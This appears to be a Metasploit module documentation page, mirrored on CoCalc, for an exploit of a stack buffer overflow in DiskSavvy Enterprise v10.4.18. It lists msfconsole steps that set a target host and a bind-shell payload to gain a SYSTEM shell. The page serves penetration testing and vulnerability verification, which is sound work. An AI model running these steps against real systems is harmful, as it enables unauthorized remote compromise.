CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
Views: 1904
Vulnerable Application
DiskSavvy Enterprise version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at DiskSavvy Enterprise.
Verification Steps
Install a vulnerable DiskSavvy Enterprise
Start
msfconsole
Do
use exploit/windows/misc/disk_savvy_adm
Do
set RHOST ip
Do
set PAYLOAD windows/shell/bind_tcp
Do
exploit
Enjoy your shell